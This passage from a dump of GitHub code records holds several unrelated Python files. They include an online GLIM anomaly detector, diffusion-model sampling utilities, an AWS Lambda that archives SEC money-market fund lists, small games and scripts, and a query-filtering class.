plt.show()\n\n if plot_anomaly_score:\n plt.subplot(211)\n plt.title(\"Anomaly Scores\")\n plt.plot(anomaly_scores)\n plt.ylim([.99,1])\n plt.subplot(212)\n plt.title(\"Time Series\")\n plt.plot(ts_obj.dataframe[\"value\"].values) \n plt.axvline(ts_obj.get_probationary_index(), color=\"black\", label=\"probationary line\")\n plt.tight_layout()\n plt.show()\n\n return {\n 'Anomaly Scores': anomaly_scores,\n 'Time': end-start,\n \"Predictions\": results_predictions\n }\n\n\ndef online_glim(endog, exog, lambda_=1.0, eta=1.0, family='gaussian',\n initial_loc=None, initial_scale=None, save_precision=False):\n \"\"\"\n :param lambda_: Decay factor for \"RLS\"\n :param eta: learning rate (kludge, helps with stability in some cases)\n :param link: specify the distribution\n :param initial_loc: initial value for location parameter (affects stability)\n :param initial_scale: initial value for scale parameter\n :param save_precision: store the precision matrix at each time step\n \"\"\"\n link = {\n 'gaussian': 
ah.Gaussian,\n 'poisson': ah.Poisson,\n }[family]()\n N = endog.shape[0]\n M = exog.shape[1]\n errors = np.zeros(N)\n predictions = np.zeros(N)\n estimates = np.zeros((N,M))\n precisions = np.zeros((N,M,M)) if save_precision else None\n lambda_inv = np.reciprocal(lambda_)\n P = np.eye(M)\n w = np.zeros(M)\n if 'Intercept' in exog.columns:\n intercept_index = exog.columns.get_loc('Intercept')\n w[intercept_index] = link.inv_mean(initial_loc)\n for t in tqdm(range(N)):\n u, d = exog.values[t], endog.values[t]\n # predict\n z = w.dot(u)\n y = link.mean(z)\n # update\n if not np.isnan(d):\n xi = d - y\n var_inv = link.inv_variance(z)\n pi = P.dot(u)\n k = pi / (lambda_ + u.dot(pi))\n w = w + eta*k*xi*var_inv\n P = lambda_inv*(P - np.outer(k, u).dot(P))\n else:\n xi = np.nan\n # save state and predictions\n errors[t] = xi\n predictions[t] = y\n estimates[t] = w\n if save_precision:\n precisions[t] = P\n predictions = pd.Series(predictions, index=endog.index)\n errors = pd.Series(errors, index=endog.index)\n estimates = pd.DataFrame(estimates, columns=exog.columns, index=endog.index)\n return ah.PredictionResults(predictions, errors, estimates, precisions)\n","repo_name":"dn3kmc/jair_anomaly_detection","sub_path":"anomaly_detection_methods/glim_method.py","file_name":"glim_method.py","file_ext":"py","file_size_in_byte":6222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"71180351287","text":"import random\r\n\r\nchoices = ['R', 'P', 'S']\r\nchoice_dict = {'R': 'Rock', 'P': 'Paper', 'S': 'Scissors'}\r\n\r\ndef rps():\r\n user_input = input(\"Pick a choice, [R, P or S]: \")\r\n user_input = user_input.upper()\r\n if user_input not in choices:\r\n print(\"Try again\")\r\n\r\n cpu_pick = random.choice(choices)\r\n print(f\"Player ({choice_dict[user_input]}) : CPU ({choice_dict[cpu_pick]})\")\r\n\r\n if user_input == cpu_pick:\r\n print(\"Tie. 
Try again\")\r\n return repr(rps())\r\n elif user_input == \"R\":\r\n if cpu_pick == 'S': \r\n return (\"Player wins\")\r\n else:\r\n return (\"CPU wins\")\r\n elif user_input == \"S\":\r\n if cpu_pick == \"P\":\r\n return (\"Player wins\")\r\n else:\r\n return (\"CPU wins\")\r\n elif user_input == \"P\":\r\n if cpu_pick == \"R\":\r\n return (\"Player wins\")\r\n else:\r\n return (\"CPU wins\")\r\n\r\nprint(repr(rps()))","repo_name":"Desmazing/zuri_fullstack","sub_path":"rock_paper_scissors_v2.py","file_name":"rock_paper_scissors_v2.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"4295079159","text":"\"\"\"\nThis code started out as a PyTorch port of Ho et al's diffusion models:\nhttps://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/diffusion_utils_2.py\n\nDocstrings have been added, as well as DDIM sampling and a new collection of beta schedules.\n\"\"\"\n\nimport enum\nimport math\n\nimport numpy as np\nimport torch as th\n\nfrom .nn import mean_flat\nfrom .losses import normal_kl, discretized_gaussian_log_likelihood\n\n\ndef get_named_beta_schedule(schedule_name, num_diffusion_timesteps):\n\n if schedule_name == \"linear\":\n # Linear schedule from Ho et al, extended to work for any number of\n # diffusion steps.\n scale = 1000 / num_diffusion_timesteps\n beta_start = scale * 0.0001\n beta_end = scale * 0.02\n return np.linspace(\n beta_start, beta_end, num_diffusion_timesteps, dtype=np.float64\n )\n elif schedule_name == \"cosine\":\n return betas_for_alpha_bar(\n num_diffusion_timesteps,\n lambda t: math.cos((t + 0.008) / 1.008 * math.pi / 2) ** 2,\n )\n else:\n raise NotImplementedError(f\"unknown beta schedule: {schedule_name}\")\n\n\ndef betas_for_alpha_bar(num_diffusion_timesteps, alpha_bar, max_beta=0.999):\n\n betas = []\n for i in range(num_diffusion_timesteps):\n t1 = i / num_diffusion_timesteps\n t2 = (i + 1) / num_diffusion_timesteps\n betas.append(min(1 - alpha_bar(t2) / alpha_bar(t1), max_beta))\n return np.array(betas)\n\n\nclass ModelMeanType(enum.Enum):\n\n PREVIOUS_X = enum.auto() # the model predicts x_{t-1}\n START_X = enum.auto() # the model predicts x_0\n EPSILON = enum.auto() # the model predicts epsilon\n\n\nclass ModelVarType(enum.Enum):\n\n LEARNED = enum.auto()\n FIXED_SMALL = enum.auto()\n FIXED_LARGE = enum.auto()\n LEARNED_RANGE = enum.auto()\n\n\nclass LossType(enum.Enum):\n MSE = enum.auto() # use raw MSE loss (and KL when learning variances)\n RESCALED_MSE = (\n enum.auto()\n ) # use raw MSE loss (with RESCALED_KL when learning variances)\n KL = enum.auto() # use the variational lower-bound\n RESCALED_KL = enum.auto() # like KL, but rescale to estimate the full VLB\n\n def is_vb(self):\n return self == LossType.KL or self == LossType.RESCALED_KL\n\n\nclass GaussianDiffusion:\n\n def __init__(\n self,\n *,\n betas,\n model_mean_type,\n model_var_type,\n loss_type,\n rescale_timesteps=False,\n ):\n self.model_mean_type = model_mean_type # predict noise or expectation of mean or x_0\n self.model_var_type = model_var_type # learnable or fix\n self.loss_type = loss_type\n self.rescale_timesteps = rescale_timesteps\n\n # Use float64 for accuracy.\n betas = np.array(betas, dtype=np.float64)\n self.betas = betas\n assert len(betas.shape) == 1, \"betas must be 1-D\"\n assert (betas > 0).all() and (betas <= 1).all()\n\n self.num_timesteps = int(betas.shape[0])\n\n alphas = 1.0 - betas\n self.alphas_cumprod = 
np.cumprod(alphas, axis=0)\n self.alphas_cumprod_prev = np.append(1.0, self.alphas_cumprod[:-1])\n self.alphas_cumprod_next = np.append(self.alphas_cumprod[1:], 0.0)\n assert self.alphas_cumprod_prev.shape == (self.num_timesteps,)\n\n # calculations for diffusion q(x_t | x_{t-1}) and others\n self.sqrt_alphas_cumprod = np.sqrt(self.alphas_cumprod)\n self.sqrt_one_minus_alphas_cumprod = np.sqrt(1.0 - self.alphas_cumprod)\n self.log_one_minus_alphas_cumprod = np.log(1.0 - self.alphas_cumprod)\n self.sqrt_recip_alphas_cumprod = np.sqrt(1.0 / self.alphas_cumprod)\n self.sqrt_recipm1_alphas_cumprod = np.sqrt(1.0 / self.alphas_cumprod - 1)\n\n # calculations for posterior q(x_{t-1} | x_t, x_0)\n self.posterior_variance = (\n betas * (1.0 - self.alphas_cumprod_prev) / (1.0 - self.alphas_cumprod)\n )\n # log calculation clipped because the posterior variance is 0 at the\n # beginning of the diffusion chain.\n self.posterior_log_variance_clipped = np.log(\n np.append(self.posterior_variance[1], self.posterior_variance[1:])\n )\n self.posterior_mean_coef1 = (\n betas * np.sqrt(self.alphas_cumprod_prev) / (1.0 - self.alphas_cumprod)\n )\n self.posterior_mean_coef2 = (\n (1.0 - self.alphas_cumprod_prev)\n * np.sqrt(alphas)\n / (1.0 - self.alphas_cumprod)\n )\n\n def q_mean_variance(self, x_start, t): # q-True distribution\n\n mean = (\n _extract_into_tensor(self.sqrt_alphas_cumprod, t, x_start.shape) * x_start\n )\n variance = _extract_into_tensor(1.0 - self.alphas_cumprod, t, x_start.shape)\n log_variance = _extract_into_tensor(\n self.log_one_minus_alphas_cumprod, t, x_start.shape\n )\n return mean, variance, log_variance\n\n def q_sample(self, x_start, t, noise=None):\n\n if noise is None:\n noise = th.randn_like(x_start)\n assert noise.shape == x_start.shape\n return (\n _extract_into_tensor(self.sqrt_alphas_cumprod, t, x_start.shape) * x_start\n + _extract_into_tensor(self.sqrt_one_minus_alphas_cumprod, t, x_start.shape)\n * noise\n )\n\n def q_posterior_mean_variance(self, x_start, x_t, t):\n\n assert x_start.shape == x_t.shape\n posterior_mean = (\n _extract_into_tensor(self.posterior_mean_coef1, t, x_t.shape) * x_start\n + _extract_into_tensor(self.posterior_mean_coef2, t, x_t.shape) * x_t\n )\n posterior_variance = _extract_into_tensor(self.posterior_variance, t, x_t.shape)\n posterior_log_variance_clipped = _extract_into_tensor(\n self.posterior_log_variance_clipped, t, x_t.shape\n )\n assert (\n posterior_mean.shape[0]\n == posterior_variance.shape[0]\n == posterior_log_variance_clipped.shape[0]\n == x_start.shape[0]\n )\n return posterior_mean, posterior_variance, posterior_log_variance_clipped\n\n def p_mean_variance( ### get mean and var using in reverse process\n self, model, x, t, clip_denoised=True, denoised_fn=None, model_kwargs=None\n ):\n\n if model_kwargs is None:\n model_kwargs = {}\n\n B, C = x.shape[:2]\n assert t.shape == (B,)\n\n model_output = model(x, self._scale_timesteps(t), **model_kwargs)\n\n if self.model_var_type in [ModelVarType.LEARNED, ModelVarType.LEARNED_RANGE]:\n assert model_output.shape == (B, C * 2, *x.shape[2:])\n model_output, model_var_values = th.split(model_output, C, dim=1)\n if self.model_var_type == ModelVarType.LEARNED:\n model_log_variance = model_var_values\n model_variance = th.exp(model_log_variance)\n else:\n min_log = _extract_into_tensor(\n self.posterior_log_variance_clipped, t, x.shape\n )\n max_log = _extract_into_tensor(np.log(self.betas), t, x.shape)\n # The model_var_values is [-1, 1] for [min_var, max_var].\n frac = (model_var_values + 
1) / 2\n model_log_variance = frac * max_log + (1 - frac) * min_log\n model_variance = th.exp(model_log_variance)\n else:\n model_variance, model_log_variance = {\n # for fixedlarge, we set the initial (log-)variance like so\n # to get a better decoder log likelihood.\n ModelVarType.FIXED_LARGE: (\n np.append(self.posterior_variance[1], self.betas[1:]),\n np.log(np.append(self.posterior_variance[1], self.betas[1:])),\n ),\n ModelVarType.FIXED_SMALL: (\n self.posterior_variance,\n self.posterior_log_variance_clipped,\n ),\n }[self.model_var_type]\n model_variance = _extract_into_tensor(model_variance, t, x.shape)\n model_log_variance = _extract_into_tensor(model_log_variance, t, x.shape)\n\n def process_xstart(x):\n if denoised_fn is not None:\n x = denoised_fn(x)\n if clip_denoised:\n return x.clamp(-1, 1)\n return x\n\n if self.model_mean_type == ModelMeanType.PREVIOUS_X:\n pred_xstart = process_xstart(\n self._predict_xstart_from_xprev(x_t=x, t=t, xprev=model_output)\n )\n model_mean = model_output\n elif self.model_mean_type in [ModelMeanType.START_X, ModelMeanType.EPSILON]:\n if self.model_mean_type == ModelMeanType.START_X:\n pred_xstart = process_xstart(model_output)\n else:\n pred_xstart = process_xstart(\n self._predict_xstart_from_eps(x_t=x, t=t, eps=model_output)\n )\n model_mean, _, _ = self.q_posterior_mean_variance(\n x_start=pred_xstart, x_t=x, t=t\n )\n else:\n raise NotImplementedError(self.model_mean_type)\n\n assert (\n model_mean.shape == model_log_variance.shape == pred_xstart.shape == x.shape\n )\n return {\n \"mean\": model_mean,\n \"variance\": model_variance,\n \"log_variance\": model_log_variance,\n \"pred_xstart\": pred_xstart,\n }\n\n def _predict_xstart_from_eps(self, x_t, t, eps):\n assert x_t.shape == eps.shape\n return (\n _extract_into_tensor(self.sqrt_recip_alphas_cumprod, t, x_t.shape) * x_t\n - _extract_into_tensor(self.sqrt_recipm1_alphas_cumprod, t, x_t.shape) * eps\n )\n\n def _predict_xstart_from_xprev(self, x_t, t, xprev):\n assert x_t.shape == xprev.shape\n return ( # (xprev - coef2*x_t) / coef1\n _extract_into_tensor(1.0 / self.posterior_mean_coef1, t, x_t.shape) * xprev\n - _extract_into_tensor(\n self.posterior_mean_coef2 / self.posterior_mean_coef1, t, x_t.shape\n )\n * x_t\n )\n\n def _predict_eps_from_xstart(self, x_t, t, pred_xstart):\n\n return (\n _extract_into_tensor(self.sqrt_recip_alphas_cumprod, t, x_t.shape) * x_t\n - pred_xstart\n ) / _extract_into_tensor(self.sqrt_recipm1_alphas_cumprod, t, x_t.shape)\n\n def _scale_timesteps(self, t):\n if self.rescale_timesteps:\n return t.float() * (1000.0 / self.num_timesteps)\n return t\n\n def condition_mean(self, cond_fn, p_mean_var, x, t, model_kwargs=None):\n\n gradient = cond_fn(x, self._scale_timesteps(t), **model_kwargs)\n new_mean = (\n p_mean_var[\"mean\"].float() + p_mean_var[\"variance\"] * gradient.float()\n )\n return new_mean\n\n def condition_score(self, cond_fn, p_mean_var, x, t, model_kwargs=None):\n\n alpha_bar = _extract_into_tensor(self.alphas_cumprod, t, x.shape)\n\n eps = self._predict_eps_from_xstart(x, t, p_mean_var[\"pred_xstart\"])\n eps = eps - (1 - alpha_bar).sqrt() * cond_fn(\n x, self._scale_timesteps(t), **model_kwargs\n )\n\n out = p_mean_var.copy()\n out[\"pred_xstart\"] = self._predict_xstart_from_eps(x, t, eps)\n out[\"mean\"], _, _ = self.q_posterior_mean_variance(\n x_start=out[\"pred_xstart\"], x_t=x, t=t\n )\n return out\n\n def p_sample(\n self,\n model,\n x,\n t,\n clip_denoised=True,\n denoised_fn=None,\n cond_fn=None,\n model_kwargs=None,\n ):\n\n out = 
self.p_mean_variance(\n model,\n x,\n t,\n clip_denoised=clip_denoised,\n denoised_fn=denoised_fn,\n model_kwargs=model_kwargs,\n )\n noise = th.randn_like(x)\n nonzero_mask = (\n (t != 0).float().view(-1, *([1] * (len(x.shape) - 1)))\n ) # no noise when t == 0\n if cond_fn is not None:\n out[\"mean\"] = self.condition_mean(\n cond_fn, out, x, t, model_kwargs=model_kwargs\n )\n sample = out[\"mean\"] + nonzero_mask * th.exp(0.5 * out[\"log_variance\"]) * noise\n return {\"sample\": sample, \"pred_xstart\": out[\"pred_xstart\"]}\n\n def p_sample_loop(\n self,\n model,\n shape,\n noise=None,\n clip_denoised=True,\n denoised_fn=None,\n cond_fn=None,\n model_kwargs=None,\n device=None,\n progress=False,\n ):\n final = None\n\n for sample in self.p_sample_loop_progressive(\n model,\n shape,\n noise=noise,\n clip_denoised=clip_denoised,\n denoised_fn=denoised_fn,\n cond_fn=cond_fn,\n model_kwargs=model_kwargs,\n device=device,\n progress=progress,\n ):\n final = sample\n return final[\"sample\"]\n\n def p_sample_loop_progressive(\n self,\n model,\n shape,\n noise=None,\n clip_denoised=True,\n denoised_fn=None,\n cond_fn=None,\n model_kwargs=None,\n device=None,\n progress=False,\n ):\n\n if device is None:\n device = next(model.parameters()).device\n assert isinstance(shape, (tuple, list))\n if noise is not None:\n img = noise\n else:\n img = th.randn(*shape, device=device)\n indices = list(range(self.num_timesteps))[::-1]\n\n if progress:\n # Lazy import so that we don't depend on tqdm.\n from tqdm.auto import tqdm\n\n indices = tqdm(indices)\n\n\n for i in indices:\n t = th.tensor([i] * shape[0], device=device)\n with th.no_grad():\n out = self.p_sample(\n model,\n img,\n t,\n clip_denoised=clip_denoised,\n denoised_fn=denoised_fn,\n cond_fn=cond_fn,\n model_kwargs=model_kwargs,\n )\n yield out\n img = out[\"sample\"]\n\n def ddim_sample(\n self,\n model,\n x,\n t,\n clip_denoised=True,\n denoised_fn=None,\n cond_fn=None,\n model_kwargs=None,\n eta=0.0,\n ):\n\n out = self.p_mean_variance(\n model,\n x,\n t,\n clip_denoised=clip_denoised,\n denoised_fn=denoised_fn,\n model_kwargs=model_kwargs,\n )\n if cond_fn is not None:\n out = self.condition_score(cond_fn, out, x, t, model_kwargs=model_kwargs)\n\n # Usually our model outputs epsilon, but we re-derive it\n # in case we used x_start or x_prev prediction.\n eps = self._predict_eps_from_xstart(x, t, out[\"pred_xstart\"])\n\n alpha_bar = _extract_into_tensor(self.alphas_cumprod, t, x.shape)\n alpha_bar_prev = _extract_into_tensor(self.alphas_cumprod_prev, t, x.shape)\n sigma = (\n eta\n * th.sqrt((1 - alpha_bar_prev) / (1 - alpha_bar))\n * th.sqrt(1 - alpha_bar / alpha_bar_prev)\n )\n # Equation 12.\n noise = th.randn_like(x)\n mean_pred = (\n out[\"pred_xstart\"] * th.sqrt(alpha_bar_prev)\n + th.sqrt(1 - alpha_bar_prev - sigma ** 2) * eps\n )\n nonzero_mask = (\n (t != 0).float().view(-1, *([1] * (len(x.shape) - 1)))\n ) # no noise when t == 0\n sample = mean_pred + nonzero_mask * sigma * noise\n return {\"sample\": sample, \"pred_xstart\": out[\"pred_xstart\"]}\n\n def ddim_sample_loop(\n self,\n model,\n shape,\n noise=None,\n clip_denoised=True,\n denoised_fn=None,\n cond_fn=None,\n model_kwargs=None,\n device=None,\n progress=False,\n eta=0.0,\n ):\n\n final = None\n\n for sample in self.ddim_sample_loop_progressive(\n model,\n shape,\n noise=noise,\n clip_denoised=clip_denoised,\n denoised_fn=denoised_fn,\n cond_fn=cond_fn,\n model_kwargs=model_kwargs,\n device=device,\n progress=progress,\n eta=eta,\n ):\n final = sample\n return 
final[\"sample\"]\n\n def ddim_sample_loop_progressive(\n self,\n model,\n shape,\n noise=None,\n clip_denoised=True,\n denoised_fn=None,\n cond_fn=None,\n model_kwargs=None,\n device=None,\n progress=False,\n eta=0.0,\n ):\n\n if device is None:\n device = next(model.parameters()).device\n assert isinstance(shape, (tuple, list))\n if noise is not None:\n img = noise\n else:\n img = th.randn(*shape, device=device)\n indices = list(range(self.num_timesteps))[::-1]\n\n if progress:\n # Lazy import so that we don't depend on tqdm.\n from tqdm.auto import tqdm\n\n indices = tqdm(indices)\n\n for i in indices:\n t = th.tensor([i] * shape[0], device=device)\n with th.no_grad():\n out = self.ddim_sample(\n model,\n img,\n t,\n clip_denoised=clip_denoised,\n denoised_fn=denoised_fn,\n cond_fn=cond_fn,\n model_kwargs=model_kwargs,\n eta=eta,\n )\n yield out\n img = out[\"sample\"]\n\n def _vb_terms_bpd(\n self, model, x_start, x_t, t, clip_denoised=True, model_kwargs=None\n ):\n\n true_mean, _, true_log_variance_clipped = self.q_posterior_mean_variance(\n x_start=x_start, x_t=x_t, t=t\n )\n out = self.p_mean_variance(\n model, x_t, t, clip_denoised=clip_denoised, model_kwargs=model_kwargs\n )\n kl = normal_kl(\n true_mean, true_log_variance_clipped, out[\"mean\"], out[\"log_variance\"]\n )\n kl = mean_flat(kl) / np.log(2.0)\n\n decoder_nll = -discretized_gaussian_log_likelihood(\n x_start, means=out[\"mean\"], log_scales=0.5 * out[\"log_variance\"]\n )\n assert decoder_nll.shape == x_start.shape\n decoder_nll = mean_flat(decoder_nll) / np.log(2.0)\n\n # At the first timestep return the decoder NLL,\n # otherwise return KL(q(x_{t-1}|x_t,x_0) || p(x_{t-1}|x_t))\n output = th.where((t == 0), decoder_nll, kl)\n return {\"output\": output, \"pred_xstart\": out[\"pred_xstart\"]}\n\n def training_losses(self, model, x_start, t, model_kwargs=None, noise=None):\n\n if model_kwargs is None:\n model_kwargs = {}\n if noise is None:\n noise = th.randn_like(x_start)\n x_t = self.q_sample(x_start, t, noise=noise)\n\n terms = {}\n\n if self.loss_type == LossType.KL or self.loss_type == LossType.RESCALED_KL:\n terms[\"loss\"] = self._vb_terms_bpd(\n model=model,\n x_start=x_start,\n x_t=x_t,\n t=t,\n clip_denoised=False,\n model_kwargs=model_kwargs,\n )[\"output\"]\n if self.loss_type == LossType.RESCALED_KL:\n terms[\"loss\"] *= self.num_timesteps\n elif self.loss_type == LossType.MSE or self.loss_type == LossType.RESCALED_MSE:\n model_output = model(x_t, self._scale_timesteps(t), **model_kwargs)\n\n if self.model_var_type in [\n ModelVarType.LEARNED,\n ModelVarType.LEARNED_RANGE,\n ]:\n B, C = x_t.shape[:2]\n assert model_output.shape == (B, C * 2, *x_t.shape[2:])\n model_output, model_var_values = th.split(model_output, C, dim=1)\n # Learn the variance using the variational bound, but don't let\n # it affect our mean prediction.\n frozen_out = th.cat([model_output.detach(), model_var_values], dim=1)\n terms[\"vb\"] = self._vb_terms_bpd(\n model=lambda *args, r=frozen_out: r,\n x_start=x_start,\n x_t=x_t,\n t=t,\n clip_denoised=False,\n )[\"output\"]\n if self.loss_type == LossType.RESCALED_MSE:\n # Divide by 1000 for equivalence with initial implementation.\n # Without a factor of 1/1000, the VB term hurts the MSE term.\n terms[\"vb\"] *= self.num_timesteps / 1000.0\n\n target = {\n ModelMeanType.PREVIOUS_X: self.q_posterior_mean_variance(\n x_start=x_start, x_t=x_t, t=t\n )[0],\n ModelMeanType.START_X: x_start,\n ModelMeanType.EPSILON: noise,\n }[self.model_mean_type]\n assert model_output.shape == target.shape 
== x_start.shape\n terms[\"mse\"] = mean_flat((target - model_output) ** 2)\n if \"vb\" in terms:\n terms[\"loss\"] = terms[\"mse\"] + terms[\"vb\"]\n else:\n terms[\"loss\"] = terms[\"mse\"]\n else:\n raise NotImplementedError(self.loss_type)\n\n return terms\n\ndef _extract_into_tensor(arr, timesteps, broadcast_shape):\n\n res = th.from_numpy(arr).to(device=timesteps.device)[timesteps].float()\n while len(res.shape) < len(broadcast_shape):\n res = res[..., None]\n return res.expand(broadcast_shape)\n","repo_name":"Hxyz-123/Font-diff","sub_path":"utils/gaussian_diffusion.py","file_name":"gaussian_diffusion.py","file_ext":"py","file_size_in_byte":21610,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"76"} +{"seq_id":"12388904628","text":"#!/usr/bin/python3\ndef find_anagrams(str1, str2):\n \"\"\" Check if a word is an anagrams \"\"\"\n # converts the strings to lower case\n str1.lower()\n str2.lower()\n # check if length is same\n if (len(str1) == len(str2)):\n\n # sort the strings\n sorted_str1 = sorted(str1)\n sorted_str2 = sorted(str2)\n\n # if sorted char arrays are same\n if (sorted_str1 == sorted_str2):\n return True\n else:\n return False\n\n else:\n return False\n\nprint(find_anagrams(\"hello\", \"yello\"))\nprint(find_anagrams(\"race\", \"care\"))\nprint(find_anagrams(\"race\", \"caring\"))","repo_name":"baebeekay/pythonProject","sub_path":"anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12859810580","text":"from __future__ import print_function\nimport pandas as pd\nimport boto3\nfrom datetime import date\nimport base64\n\ns3_client = boto3.client('s3')\ns3 = boto3.resource('s3')\nsns_client = boto3.client('sns')\ntopic_arn = 'arn:aws:sns:eu-central-1:540666357414:fundmapper'\nbucket_name = \"fundmapper\"\nprefix = \"01-MMFLists/\"\n\n\ndef lambda_handler(event, context):\n today = date.today()\n mdate = today.strftime(\"%Y-%m\")\n #mdate = \"2020-11\"\n bucket = s3.Bucket(bucket_name)\n objs = list(bucket.objects.filter(Prefix=prefix))\n\n # test whether file is already processed\n for obj in objs:\n if obj.key == prefix + \"mmf-\" + mdate + \".csv\":\n sns_client.publish(TopicArn=topic_arn,\n Message=\"Found a new list, mmf-\" + mdate + \".csv processed: was already downloaded\",\n Subject='This months files is already there')\n return \"File already present\"\n\n print(\"Not stored yet; try to download\")\n\n # download new file and store to s3\n try:\n # read from SEC website\n df = pd.read_csv(\n \"https://www.sec.gov/files/investment/data/other/money-market-fund-information/mmf-\" + mdate + \".csv\")\n\n # save vector of IDs\n ids = set(df.series_id.tolist())\n\n # store locally\n df.to_csv('/tmp/mmf-\"+mdate+\".csv')\n\n # save new version to S3\n s3_client.upload_file('/tmp/mmf-\"+mdate+\".csv', bucket_name, prefix + \"mmf-\" + mdate + \".csv\")\n\n # send message\n sns_client.publish(TopicArn=topic_arn,\n Message=\"Found a new list, mmf-\" + mdate + \".csv; processed and downloaded\",\n Subject='Downloaded new report')\n\n # read existing ids\n series_ids = s3.get_object(Bucket=bucket_name, Key=\"series_ids.csv\")\n series_ids = set(pd.read_csv(series_ids['Body']).series_ids.tolist())\n n_oldids = len(series_ids)\n series_ids = series_ids.union(ids)\n\n if len(series_ids) > n_oldids:\n # prepare a new file to be saved\n series_ids = pd.DataFrame({\"series_ids\": list(series_ids)})\n\n # 
store locally\n series_ids.to_csv(\"/tmp/series_ids.csv\")\n\n # upload to S3\n s3_client.upload_file(\"/tmp/series_ids.csv\", bucket_name, \"series_ids.csv\")\n sns_client.publish(TopicArn=topic_arn,\n Message=\"Found a new list, mmf-\" + mdate + \".csv; processed and downloaded and a new ID is found.\",\n Subject='A new fund was found!')\n\n\n except:\n print(\"None found\")\n\n return \"Success \"\n\n\n","repo_name":"JannicCutura/fundmappeR","sub_path":"lambda/downloadMMFLists/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"33249273450","text":"# Done at 10/6/2018. Another username generator.\"test2\" is a good reference that its in the same idea as our old \"test\".\nimport random\nimport os\nprint(\"@cokz Usernames Generator!\")\nprint(\"Your Working directory is \" + os.getcwd())\nusers_to_generate = (\"abcdefghijklmnopqrstuvwxyz0123456789_\")\ni = 0\nsave = ['']\nuserinput = int(input(\"USERS AMOUNT:\"))\nuserinput2 = int(input(\"Enter The Length of The Username:\"))\nwhile userinput != i:\n i = i + 1\n a = random.choices(users_to_generate, k=int(userinput2))\n save += a + '\\n'\n print(''.join(a))\nuser_choice = input(\"Do You Want To Save it?\\n[Y/N} \")\nif user_choice == \"y\":\n file = open(\"Output.txt\", \"w\")\n file.write(str(save))\n file.close()\n print(\"Done!\")\nif user_choice == \"n\":\n print(\"Okay Have a Nice Day!\")","repo_name":"amjad-developer/Random-Scripts","sub_path":"Test2.py","file_name":"Test2.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72587542324","text":"import operator as op\nimport time\n\n\nclass Query(object):\n \"\"\"Main class abstracting one single query\"\"\"\n cmp_map = {'eq': op.eq, 'ne': op.ne, 'gt': op.gt, 'ge': op.ge, 'le': op.le,\n 'lt': op.lt}\n\n def __init__(self, field_name, comparisons, qtype='number'):\n \"\"\" Constructor\n\n Parameters\n ----------\n field_name: str\n string corresponding to the field for comparisons\n comparisons: dict\n each key is a \"verb\" from the following:\n 'eq', 'ne', 'le', 'lt', 'ge', 'gt'\n and value is the value of the comparison\n qtype: 'number' | 'integer' | 'date_ymd'\n The assumed type of data for this field_name. 
Values are casted\n based on this.\n \"\"\"\n self.fname = field_name\n self.cmps = comparisons\n for k, _ in self.cmps.items():\n if k not in self.cmp_map:\n raise ValueError(\"Bad comparison verb in constructor\")\n self.type = qtype\n\n def __str__(self):\n \"\"\"How to print Queries\"\"\"\n log = ' AND '.join(['%s:%s' % (comp, v) for\n comp, v in self.cmps.items()])\n return '%s %s' % (self.fname, log)\n\n def filter(self, data, return_key, qtype=''):\n \"\"\" Filter the data through this Query\n\n Parameters\n ----------\n data: seq of dicts\n assumed that each dict contains a key of the Query's field name\n return_key: dict key\n assumed that each dict also contains this key\n this key exists in the list of returned dicts\n \"\"\"\n if qtype:\n typ = qtype\n else:\n typ = self.type\n if typ in ('number', 'integer'):\n xfm = float\n elif typ == 'date_ymd':\n xfm = lambda x: time.strptime(x, '%Y-%m-%d')\n elif typ == 'email':\n raise ValueError(\"WHY ARE YOU SEARCHING BY EMAIL?\")\n else:\n xfm = str\n match = []\n if data:\n sets = []\n for comp, raw_val in self.cmps.items():\n val = xfm(raw_val)\n mat = []\n for row in data:\n try:\n new_val = xfm(row[self.fname])\n except ValueError: # probably an empty cell\n pass\n else:\n match = self.cmp_map[comp](new_val, val)\n if match: # comparison is true\n mat.append(row[return_key])\n sets.append(set(mat))\n match = list(reduce(lambda a, b: a.intersection(b), sets))\n return match\n\n def fields(self):\n \"\"\" Query and QueryGroup both respond to this method\"\"\"\n return [self.fname]\n\n\nclass QueryGroup(object):\n \"\"\"Class to hold one or more Querys (or QueryGroups!)\"\"\"\n\n def __init__(self, query):\n \"\"\" Constructor\n\n Parameters\n ----------\n query: Query | QueryGroup\n first query object\n \"\"\"\n self.queries = [query]\n self.logic = []\n self.index = 0\n self.total = 1\n\n def __str__(self):\n \"\"\"Print a QueryGroup\"\"\"\n all_logic = self.logic[:]\n if len(self.queries) > 1:\n log = ''\n # Because there's one less logic verb than queries\n all_logic.append('')\n for qry, logic in zip(self.queries, all_logic):\n if isinstance(qry, QueryGroup):\n fmt = '(%s %s) '\n else:\n fmt = '%s %s '\n log += fmt % (qry.__str__(), logic)\n return log\n else:\n return self.queries[0].__str__()\n\n def add_query(self, query, logic='AND'):\n \"\"\"Add a query to the group\n\n Parameters\n ----------\n query: Query | QueryGroup\n query to add\n logic: 'AND' | 'OR'\n logic connecting this query to the last\n \"\"\"\n self.queries.append(query)\n if logic.upper() not in ('AND', 'OR'):\n raise ValueError('Queries can only be connectd with AND | OR')\n self.logic.append(logic)\n self.total += 1\n\n def __iter__(self):\n \"\"\" So QueryGroup is an iterator\"\"\"\n return self\n\n def next(self):\n \"\"\" So we can loop through a QueryGroup \"\"\"\n if self.index == self.total:\n raise StopIteration\n next_q = self.queries[self.index]\n self.index = self.index + 1\n return next_q\n\n def fields(self):\n \"\"\"Returns a list of keys of all the field names referenced by the\n queries in the group\"\"\"\n keys = []\n for qry in self.queries:\n fields = qry.fields()\n keys.extend(fields)\n return keys\n\n def filter(self, data, return_key):\n \"\"\" Filter for the query group \"\"\"\n match = []\n for i, qry in enumerate(self.queries):\n temp_match = set(qry.filter(data, 